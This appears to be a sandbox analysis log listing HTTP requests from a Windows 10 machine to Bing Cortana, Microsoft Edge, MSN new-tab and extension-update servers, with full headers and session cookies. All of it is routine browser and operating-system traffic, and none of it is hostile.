          Source: global trafficHTTP traffic detected: GET /rp/hvBI6JcM3fiurYJTqWZEAiEc9uY.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; TOptOut=1; ak_bmsc=A88CDCB57762C2831119E8D19390832D~000000000000000000000000000000~YAAQFthUuAcZ0i+XAQAALpzqRhwwv8dujg5AfSbMiYGu/1ZsIZ4Sjvz59ZCkaYjouGk3AKmkBsJw3nJzEaWbGZthLzpJX2+IRoIG6FzSq1cPK5ICfT6HzNAmdQbK/vFAdR1YHvUOm0LBH1jgvYVkqecPdpQ6Kwc+ZLW7D+t/NUlrxUx0Z5O8k7S/Vrisiu6NEzpwwnTEG7gunBDJZyI1Wqbfg0hL4J34Uv76z24fC8x9zWRukEZQYs0TJXhI/UHDY2edd86ZLYcXsbmij6mSrXv7uqH6dGH+KVse0ALE74ijMXCycVrRQ9Wve6c3JgV0atfbVKkOHuKgYbEaOChW4gAKXMIR8k4wKZzQQzhSqWF9d6CR5J0yy3AdKLL+q6Hg69reZU7lVQ==; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /PPRelatedSearch?query=Classic_%7Bf56fbb39-e6d9-4b6d-9c29-ae82cff2925f%7D&lang=en-CH HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; TOptOut=1; ak_bmsc=A88CDCB57762C2831119E8D19390832D~000000000000000000000000000000~YAAQFthUuAcZ0i+XAQAALpzqRhwwv8dujg5AfSbMiYGu/1ZsIZ4Sjvz59ZCkaYjouGk3AKmkBsJw3nJzEaWbGZthLzpJX2+IRoIG6FzSq1cPK5ICfT6HzNAmdQbK/vFAdR1YHvUOm0LBH1jgvYVkqecPdpQ6Kwc+ZLW7D+t/NUlrxUx0Z5O8k7S/Vrisiu6NEzpwwnTEG7gunBDJZyI1Wqbfg0hL4J34Uv76z24fC8x9zWRukEZQYs0TJXhI/UHDY2edd86ZLYcXsbmij6mSrXv7uqH6dGH+KVse0ALE74ijMXCycVrRQ9Wve6c3JgV0atfbVKkOHuKgYbEaOChW4gAKXMIR8k4wKZzQQzhSqWF9d6CR5J0yy3AdKLL+q6Hg
          Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=edge&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=4&cvid=2ea0fe5c3bd8409b9218a925f0ddddff&ig=cc015392df1f4e3f89aca9aa31a79ec3 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; TOptOut=1; ak_bmsc=A88CDCB57762C2831119E8D19390832D~000000000000000000000000000000~YAAQFthUuAcZ0i+XAQAALpzqRhwwv8dujg5AfSbMiYGu/1ZsIZ4Sjvz59ZCkaYjouGk3AKmkBsJw3nJzEaWbGZthLzpJX2+IRoIG6FzSq1cPK5ICfT6HzNAmdQbK/vFAdR1YHvUOm0LBH1jgvYVkqecPdpQ6Kwc+ZLW7D+t/NUlrxUx0Z5O8k7S/Vrisiu6NEzpwwnTEG7gunBDJZyI1Wqbfg0hL4J34Uv76z24fC
          Source: global trafficHTTP traffic detected: GET /serviceexperimentation/v3/?osname=win&channel=stable&scpfull=0&scpguard=0&scpver=0&osver=10.0.19045&devicefamily=desktop&installdate=1696585423&clientversion=117.0.2045.47&experimentationmode=2 HTTP/1.1host: edge.microsoft.compragma: no-cachecache-control: no-cachesec-mesh-client-edge-version: 117.0.2045.47sec-mesh-client-edge-channel: stablesec-mesh-client-os: Windowssec-mesh-client-os-version: 10.0.19045sec-mesh-client-arch: x86_64sec-mesh-client-webview: 0sec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1host: api.edgeoffer.microsoft.comsec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531 HTTP/1.1host: ntp.msn.comsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}sec-fetch-site: nonesec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: documentaccept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /extensionwebstorebase/v1/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=edgecrx&prodchannel=&prodversion=117.0.2045.47&lang=en-GB&acceptformat=crx3,puff&x=id%3Djmjflgjpcpepeafmmgdpfkogkghcpiha%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1host: edge.microsoft.comedgefeatureflags: {"ExtensionUseNewStoreKeys":true,"UseHttpsForDownload":true}update-interactivity: fgms-cv: Di0cQm3MVHG9Xcj7TGhn9lsec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /rp/ir34uLC35WF1sY2N-nv7lDNxLng.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; TOptOut=1; ak_bmsc=A88CDCB57762C2831119E8D19390832D~000000000000000000000000000000~YAAQFthUuAcZ0i+XAQAALpzqRhwwv8dujg5AfSbMiYGu/1ZsIZ4Sjvz59ZCkaYjouGk3AKmkBsJw3nJzEaWbGZthLzpJX2+IRoIG6FzSq1cPK5ICfT6HzNAmdQbK/vFAdR1YHvUOm0LBH1jgvYVkqecPdpQ6Kwc+ZLW7D+t/NUlrxUx0Z5O8k7S/Vrisiu6NEzpwwnTEG7gunBDJZyI1Wqbfg0hL4J34Uv76z24fC8x9zWRukEZQYs0TJXhI/UHDY2edd86ZLYcXsbmij6mSrXv7uqH6dGH+KVse0ALE74ijMXCycVrRQ9Wve6c3JgV0atfbVKkOHuKgYbEaOChW4gAKXMIR8k4wKZzQQzhSqWF9d6CR5J0yy3AdKLL+q6Hg69reZU7lVQ==; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/SSR-extension.4ce0db00fadb409d133c.js HTTP/1.1host: ntp.msn.comsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"origin: https://ntp.msn.comsec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 0.7sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 150sec-ch-ua-mobile: ?0user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gaccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: scriptreferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&ds
          Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/web-worker.6974b9fb97562cb94533.js HTTP/1.1host: ntp.msn.comsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.45sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 150sec-ch-ua-mobile: ?0user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gaccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}sec-fetch-site: same-originsec-fetch-mode: same-originsec-fetch-dest: workerreferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBa
          Source: global trafficHTTP traffic detected: GET /apc/trans.gif?15b04a3f63034ae05286331c5106f22c HTTP/1.1host: s-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
          Source: global trafficHTTP traffic detected: GET /rp/lA7OChSO-itFm5e9_qLjGL6O1QM.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; TOptOut=1; ak_bmsc=A88CDCB57762C2831119E8D19390832D~000000000000000000000000000000~YAAQFthUuAcZ0i+XAQAALpzqRhwwv8dujg5AfSbMiYGu/1ZsIZ4Sjvz59ZCkaYjouGk3AKmkBsJw3nJzEaWbGZthLzpJX2+IRoIG6FzSq1cPK5ICfT6HzNAmdQbK/vFAdR1YHvUOm0LBH1jgvYVkqecPdpQ6Kwc+ZLW7D+t/NUlrxUx0Z5O8k7S/Vrisiu6NEzpwwnTEG7gunBDJZyI1Wqbfg0hL4J34Uv76z24fC8x9zWRukEZQYs0TJXhI/UHDY2edd86ZLYcXsbmij6mSrXv7uqH6dGH+KVse0ALE74ijMXCycVrRQ9Wve6c3JgV0atfbVKkOHuKgYbEaOChW4gAKXMIR8k4wKZzQQzhSqWF9d6CR5J0yy3AdKLL+q6Hg69reZU7lVQ==; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /apc/trans.gif?7326c7f9c04b053771631005a2a34c1c HTTP/1.1host: s-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
          Source: global trafficHTTP traffic detected: GET /rp/nrn0gNK7unWcRwsjmQ63z4yrlgo.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; TOptOut=1; ak_bmsc=A88CDCB57762C2831119E8D19390832D~000000000000000000000000000000~YAAQFthUuAcZ0i+XAQAALpzqRhwwv8dujg5AfSbMiYGu/1ZsIZ4Sjvz59ZCkaYjouGk3AKmkBsJw3nJzEaWbGZthLzpJX2+IRoIG6FzSq1cPK5ICfT6HzNAmdQbK/vFAdR1YHvUOm0LBH1jgvYVkqecPdpQ6Kwc+ZLW7D+t/NUlrxUx0Z5O8k7S/Vrisiu6NEzpwwnTEG7gunBDJZyI1Wqbfg0hL4J34Uv76z24fC8x9zWRukEZQYs0TJXhI/UHDY2edd86ZLYcXsbmij6mSrXv7uqH6dGH+KVse0ALE74ijMXCycVrRQ9Wve6c3JgV0atfbVKkOHuKgYbEaOChW4gAKXMIR8k4wKZzQQzhSqWF9d6CR5J0yy3AdKLL+q6Hg69reZU7lVQ==; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/vendors.656f876470635ed880a4.js HTTP/1.1host: assets.msn.comsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"origin: https://ntp.msn.comsec-ch-ua-mobile: ?0user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"accept: */*sec-fetch-site: same-sitesec-fetch-mode: corssec-fetch-dest: scriptreferer: https://ntp.msn.com/accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /crx/blobs/AcpJF5jcHVRgbVEms6vmE6qdKx_UoPPrgHXLFLqJ60_g48hIoz8HdxmRghg9YmmktQ_wvReJ4Zmls0_lEjFZTPWqynE9hnK76r9FpfYlK4ZsmLmNnA06hxTuvSMctgcxNzkAxlKa5cKF0Myihfg8d9NTQvFXhnGfxXDF/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_92_1_0.crx HTTP/1.1host: clients2.googleusercontent.comsec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /rp/oFjhPfAE6_U0PHIglZv0OCyOg2E.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; TOptOut=1; ak_bmsc=A88CDCB57762C2831119E8D19390832D~000000000000000000000000000000~YAAQFthUuAcZ0i+XAQAALpzqRhwwv8dujg5AfSbMiYGu/1ZsIZ4Sjvz59ZCkaYjouGk3AKmkBsJw3nJzEaWbGZthLzpJX2+IRoIG6FzSq1cPK5ICfT6HzNAmdQbK/vFAdR1YHvUOm0LBH1jgvYVkqecPdpQ6Kwc+ZLW7D+t/NUlrxUx0Z5O8k7S/Vrisiu6NEzpwwnTEG7gunBDJZyI1Wqbfg0hL4J34Uv76z24fC8x9zWRukEZQYs0TJXhI/UHDY2edd86ZLYcXsbmij6mSrXv7uqH6dGH+KVse0ALE74ijMXCycVrRQ9Wve6c3JgV0atfbVKkOHuKgYbEaOChW4gAKXMIR8k4wKZzQQzhSqWF9d6CR5J0yy3AdKLL+q6Hg69reZU7lVQ==; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/experience.875fbf4ca947b56bd6b7.js HTTP/1.1host: assets.msn.comsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"origin: https://ntp.msn.comsec-ch-ua-mobile: ?0user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"accept: */*sec-fetch-site: same-sitesec-fetch-mode: corssec-fetch-dest: scriptreferer: https://ntp.msn.com/accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/microsoft.9ba3f7ec1232833414fa.js HTTP/1.1host: assets.msn.comsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"origin: https://ntp.msn.comsec-ch-ua-mobile: ?0user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"accept: */*sec-fetch-site: same-sitesec-fetch-mode: corssec-fetch-dest: scriptreferer: https://ntp.msn.com/accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /rp/pCYxgMw9oTm68Xg7OdrI9hylvf8.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; TOptOut=1; ak_bmsc=A88CDCB57762C2831119E8D19390832D~000000000000000000000000000000~YAAQFthUuAcZ0i+XAQAALpzqRhwwv8dujg5AfSbMiYGu/1ZsIZ4Sjvz59ZCkaYjouGk3AKmkBsJw3nJzEaWbGZthLzpJX2+IRoIG6FzSq1cPK5ICfT6HzNAmdQbK/vFAdR1YHvUOm0LBH1jgvYVkqecPdpQ6Kwc+ZLW7D+t/NUlrxUx0Z5O8k7S/Vrisiu6NEzpwwnTEG7gunBDJZyI1Wqbfg0hL4J34Uv76z24fC8x9zWRukEZQYs0TJXhI/UHDY2edd86ZLYcXsbmij6mSrXv7uqH6dGH+KVse0ALE74ijMXCycVrRQ9Wve6c3JgV0atfbVKkOHuKgYbEaOChW4gAKXMIR8k4wKZzQQzhSqWF9d6CR5J0yy3AdKLL+q6Hg69reZU7lVQ==; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common.a3766318872af12b434b.js HTTP/1.1host: assets.msn.comsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"origin: https://ntp.msn.comsec-ch-ua-mobile: ?0user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"accept: */*sec-fetch-site: same-sitesec-fetch-mode: corssec-fetch-dest: scriptreferer: https://ntp.msn.com/accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /rp/pyuPhXK8l-xFBxa9DuSIQj-yyIc.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; TOptOut=1; 